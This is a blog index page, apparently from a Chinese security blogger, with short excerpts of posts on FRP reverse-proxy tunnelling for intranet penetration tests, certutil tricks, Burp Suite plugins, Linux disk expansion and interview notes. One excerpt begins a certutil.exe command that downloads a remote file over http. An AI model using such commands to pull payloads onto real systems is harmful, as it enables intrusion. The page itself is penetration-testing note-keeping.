摘要: 前言 之前在一个项目中遇到了一个渗透环境,只能使用工具代理远程访问内网,于是便接触了FRP这款内网穿透工具,通过内网反向代理进行远程渗透测试。这篇文章就简单介绍如何实现FRP反向代理渗透,作为个人笔记方便以后查阅,也分享给大家提供参考。 0x01 工具简介 FRP 是一个专注于内网穿透的高性能的反向 阅读全文
posted @ 2023-02-16 18:12 华中第一黑 阅读(729) 评论(0) 推荐(0) 编辑
摘要: 1.学好Python 2.考个CISP证(CISP-PTS?) 3.学好PHP 4.丰富实战渗透的经验 阅读全文
posted @ 2023-01-29 10:28 华中第一黑 阅读(87) 评论(2) 推荐(2) 编辑
摘要: 前言 在先知看到一篇关于certutil命令的文章(关于certutil的探究),讲得很详细、很全面。特此记录下本人在渗透时使用certutil的一些方法。 在cmd下使用certutil下载远程文件 命令: certutil.exe -urlcache -split -f http://192.1 阅读全文
posted @ 2023-01-10 18:07 华中第一黑 阅读(1171) 评论(0) 推荐(1) 编辑
摘要: 乌鸦安全的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。 乌鸦安全拥有对此文章的修改、删除和解释权限 阅读全文
posted @ 2023-01-10 16:54 华中第一黑 阅读(820) 评论(0) 推荐(1) 编辑
摘要: 何为certutil certutil.exe 是一个合法Windows文件,用于管理Windows证书的程序。 微软官方是这样对它解释的: Certutil.exe是一个命令行程序,作为证书服务的一部分安装。您可以使用Certutil.exe转储和显示证书颁发机构(CA)配置信息,配置证书服务,备 阅读全文
posted @ 2023-01-10 16:44 华中第一黑 阅读(782) 评论(0) 推荐(0) 编辑
摘要: Burpsuite 资料整理, 整到一起比较方便。大家有更多关于Burpsuite的Tip请一起增量。谢谢! 插件 序号 名称 功能 参考文档 1 Turbo intruder 并发 https://www.freebuf.com/sectool/243953.htmlhttps://blog.cs 阅读全文
posted @ 2022-12-28 16:31 华中第一黑 阅读(308) 评论(0) 推荐(0) 编辑
摘要: 背景: 线上服务器,磁盘Linux的虚拟机根分区已经使用90%,触发了磁盘告警,再一顿操作删除后,勉勉强强回到了82%,现在需要对根目录进行扩容。 进入到EXSI管理平台,看到原来的sda磁盘只有30G【图一】,新添加一块100G 的新硬盘【图二】 图一 图二 登录机器,查看磁盘,发现了多了一块sd 阅读全文
posted @ 2022-11-28 10:38 华中第一黑 阅读(5675) 评论(0) 推荐(0) 编辑
摘要: # :面试总结 # 目录 [TOC] >如果你觉得我写的不够清楚,或者还有很多东西没有写。>>那么一定是我觉得很简单不用写的内容,严格的来说,这些简答的内容,应该已经化作养分融入到了你的血液,成为了你的生物行为和习惯。>>如果这些都不会,我觉得,就算你去忽悠面试官,你也忽悠不了。>>所以还是老老实实 阅读全文
posted @ 2022-10-09 14:06 华中第一黑 阅读(854) 评论(0) 推荐(0) 编辑
摘要: 在我的博客里有一些文章是和解码或者处理文件有关,其中有些自动化工作比较简单,使用了一些PHP程序来编写处理,这样写起程序来也比较快,因为是纯过程的任务,不想用C#来处理。 写完PHP的脚本程序后,保存在文件了,按大多数人的理解,可能是会做一个WEB服务,然后通过浏览器去访问一下这个文件,它就运行了, 阅读全文
posted @ 2022-08-12 10:34 华中第一黑 阅读(379) 评论(0) 推荐(0) 编辑
摘要: https://github.com/badboycxcc/LinuxTQ 阅读全文
posted @ 2022-07-25 14:36 华中第一黑 阅读(39) 评论(0) 推荐(0) 编辑